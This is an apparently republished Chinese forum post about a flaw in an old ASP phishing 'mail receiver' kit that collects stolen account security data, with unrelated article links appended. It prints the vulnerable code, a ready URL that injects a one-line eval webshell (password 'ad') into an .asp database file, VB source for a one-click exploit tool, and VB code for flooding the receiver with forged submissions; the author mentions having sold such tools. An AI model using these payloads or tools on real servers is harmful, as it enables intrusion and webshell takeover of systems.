伯乐asp收信程序漏洞及利用程序利用代码

http://forum.eviloctal.com/thread-32151-1-1.html 
之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧.. 
伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞) 
主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保.. 
mibao.asp文件对提交的参数没有任何过滤 


代码如下:

if action="put" then  
sql="select * from mibao where u='"&request("u")&"'"  
set rs=Server.CreateObject("ADODB.RecordSet")  
rs.open sql,conn,1,3  
if rs.eof then  
rs.addnew  
rs("u")=request("u")  
rs("pos")=request("pos")  
rs("p")="等待破解"  
rs.update  
rs.close

response.write "addok"  
else  
sql="update mibao set pos='"&request("pos")&"'"&" where u='"&request("u")&"'"  
conn.execute(sql)  
response.write "updateok"  
end if  
end if

第一行代码处

ConnStr="Provider = Microsoft.Jet.OLEDB.4.0;Data Source =" & Server.MapPath("mibaoaa.asp")提交的数据插进了mibaoaa.asp 
asp后缀的数据库文件..未做防下载处理..提交一句话木马..很容易得到webshell

假设箱子地址是 
http://127.0.0.1/ 
就访问 
http://127.0.0.1/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3

返回 "addok"就说明插马成功 
接着 
http://127.0.0.1/mibaoaa.asp访问小马.. 
密码是ad.上传大马拿到webshell

根据此漏洞我用VB写了一个简单的利用程序.. 
程序VB源码

代码如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/mibao.asp?action=put&u=3&pos=3<%25eval request(%22%61%64%22) %25>&mb=3&p=3") '用inet连接网页 
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置 
If aa <> 0 Then '页头中包含404 
MsgBox "木马插入失败!", 48, "失败!" '则说明该网页不存在 
Else '如果页头中不包含“404” 
MsgBox "木马插入成功!", 64, "恭喜!" '说明网页存在 
Command2.Enabled = True 
End If 
End Sub

Private Sub Command2_Click() 
If Text2.Text = Text1.Text + "/mibaoaa.asp" Then 
MsgBox "已经存在!请不要重复此操作!", 16, "error!" 
Else 
Text2.Text = Text1.Text + "/mibaoaa.asp" 
MsgBox "请使用一句话木马客户段连接!密码ad!", 64, "成功!" 
Text2.Visible = True 
End If 
End Sub

Private Sub Command3_Click() 
End 
End Sub

程序和动画演示我也一并打包上传了..教程因为是去年做的了..里面一些信息请各位兄弟看后不要再去尝试了..
教程里所写的联系QQ也不要再去加了..那时候因为混口饭吃..卖了几个程序..

现在全部都公开了.. BOLE.RAR (2.5 MB)

另外看到贴中有人提到刷信问题..lin.asp也是没怎么过滤的..可以外部提交数据

VB刷信代码

代码如下:

Private Sub Command1_Click() 
Inet1.OpenURL (Text1.Text + "/lin.asp?a=" + Text2.Text + "&s=" + Text3.Text + "&u=" + Text4.Text + "&p=" + Text5.Text + "&r=" + Text7.Text + "&l=" + Text8.Text + "&m=" + Text9.Text + "&pin=" + Text6.Text) '用inet连接网页 
aa = InStr(Inet1.GetHeader, "404") '判断页头是否包含字符“404”,返回0则不包含,否则返回其位置 
If aa <> 0 Then '页头中包含404 
MsgBox "刷信失败!默认收信页面可能被改名!", 48, "失败!" '则说明该网页不存在 
Else '如果页头中不包含“404” 
MsgBox "刷信成功!请登陆后台查看!", 64, "恭喜!" '说明网页存在 
End If 
End Sub

Private Sub Command2_Click() 
End 
End Sub

(0)

相关推荐

  • 伯乐asp收信程序漏洞及利用程序利用代码

    http://forum.eviloctal.com/thread-32151-1-1.html  之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是个学习吧..  伯乐的收信程序(针对以前的老版本.后来修补了这个漏洞)  主数据库名第一次使用设置时是随机产生的..但因为他是通用收信程序..可以截获密保..  mibao.asp文件对提交的参数没有任何过滤  复制代码 代码如下: if action="put" then  

  • asp.net音频转换之.amr转.mp3(利用ffmpeg转换法)

    asp.net音频转换之.amr转.mp3(利用ffmpeg转换法)

    前言 上篇文章已经跟大家分享了asp.net利用七牛转换法将.amr转.mp3的方法,当时也说了还有另外一种方法是利用ffmpeg转换法,下面这篇文章就给大家详细介绍这种方法.这种方法相对第一种来说,要简单的多! FFmpeg的名称来自MPEG视频编码标准,前面的"FF"代表"Fast Forward",FFmpeg是一套可以用来记录.转换数字音频.视频,并能将其转化为流的开源计算机程序.可以轻易地实现多种视频格式之间的相互转换. ffmpeg转换法 首先,你得下载

  • asp.net音频转换之.amr转.mp3(利用七牛转换法)

    asp.net音频转换之.amr转.mp3(利用七牛转换法)

    前言 相信大家应该都知道吧,.amr格式用于移动设备的音频,压缩比比较大,多用于人声.通话,效果还行!所以,移动设备多采用amr格式来进行录存!比较常见的例子:通话录音,微信语音以及录音等! 但是这个鬼,用两个字来形容,就是"蛋疼":因为HTML5压根就不支持它(amr:我是个<孤儿> ,导演:佐米·希尔拉):所以,试听效果也就很难实现了!虽然微信是提供试听的,但一旦离开了页面,那就意味着,你再也无法播放你的录音了! 所以你不得不将文件转换下格式! 目前,小编掌握的转换格式

  • POC漏洞批量验证程序Python脚本编写

    POC漏洞批量验证程序Python脚本编写

    目录 编写目的 需求分析 实现过程 Main函数 获取目标 批量请求验证 加载POC 多线程类 urlParse getProxy randomHeaders 输出结果 其他 全局变量 命令行读取参数 poc详情显示 Ctrl+C结束线程 poc.json文件 运行结果 FoFa获取目标 poc验证 总结 完整代码 编写目的 批量验证poc,Python代码练习. 需求分析 1.poc尽可能简单. 2.多线程. 3.联动fofa获取目标. 4.随机请求头. 实现过程 脚本分为三个模块,获取poc

  • 如何在微信小程序里面退出小程序的方法

    如何在微信小程序里面退出小程序的方法

    公司要求用小程序重构已有的微信公众号,于是没接触过小程序的我...好的,直接进入主题. 如何在小程序里面退出小程序. 这个功能基本上都会用到,而文档里面没有找到如微信一样直接的api: WeixinJSBridge.call('closeWindow'); 于是我就各种上网搜,好的,结果告诉我小程序已经出了这个api,但未公开= =||| 那就是说 现在 是没有这个api的(掀桌!),查了又查,是有一个方法,就是利用现有的api自己做一个. 是的,就是用这几个美丽的东西. 首先我们有两个页面,i

  • ASP.NET Core 使用Cookie验证身份的示例代码

    ASP.NET Core 1.x提供了通过Cookie 中间件将用户主体序列化为一个加密的Cookie,然后在后续请求中验证Cookie并重新创建主体,并将其分配给HttpContext.User属性.如果您要提供自己的登录界面和用户数据库,可以使用作为独立功能的Cookie中间件. ASP.NET Core 2.x的一个主要变化是不再存在Cookie中间件.取而代之的是在Startup.cs文件中的Configure方法中的调用UseAuthentication方法会添加设置HttpConte

  • 微信小程序 获取手机号 JavaScript解密示例代码详解

    微信小程序 获取手机号 JavaScript解密示例代码详解

    当我们在开发微信小程序中,有一个常用的功能,就是获取用户的手机号,然后一键登入小程序,那么手机号如何获取呢?请认真看完本文,保证可以获取到用户的手机号. 刚开始开发微信小程序的时候,想着实现手机验证码登入,后来查阅资料得知,发给用户的短信是要自己付费的.后来想想,微信获取用户的手机号一样可以保证手机号码的真实性,因为手机号既然可以绑定微信,那么肯定是被严格核验过的,然后就开始了获取手机号之旅,网上教程有很多,但不知什么原因,都是会少一些内容,有的只有前端代码,没有后端:有的后端代码是PHP,不是

  • WPF+ASP.NET SignalR实现后台通知功能的示例代码

    WPF+ASP.NET SignalR实现后台通知功能的示例代码

    目录 涉及知识点 前提条件 服务端 客户端 运行示例 在实际业务中,当后台数据发生变化,客户端能够实时的收到通知,而不是由用户主动的进行页面刷新才能查看,这将是一个非常人性化的设计.比如数字化大屏,并没有人工的干预,而是自动的刷新数据,那如何才能实现数据的实时刷新呢?本文以一个简单示例,简述如何通过WPF+ASP.NET SignalR实现消息后台通知以及数据的实时刷新,仅供学习分享使用,如有不足之处,还请指正. 通过上一篇文章的学习,了解了如何通过SignalR实现在线聊天功能,在示例中,我们

  • ASP.NET实现Hadoop增删改查的示例代码

    ASP.NET实现Hadoop增删改查的示例代码

    本文介绍了ASP.NET实现Hadoop增删改查的示例代码,分享给大家,具体如下: packages.config <?xml version="1.0" encoding="utf-8"?> <packages> <package id="Microsoft.AspNet.WebApi.Client" version="4.0.20505.0" targetFramework="net

  • 微信小程序 slider 详解及实例代码

    微信小程序 slider 详解及实例代码

    微信小程序slider 相关文章: 微信小程序 Button 微信小程序 radio 微信小程序 slider 微信小程序 switch 微信小程序 textarea 微信小程序 picker-view 微信小程序 picker 微信小程序 label 微信小程序 input 微信小程序 form 微信小程序 checkbox 实现效果图: 滑动选择器 属性名 类型 默认值 说明 min Number 0 最小值 max Number 100 最大值 step Number 1 步长,取值必须大

随机推荐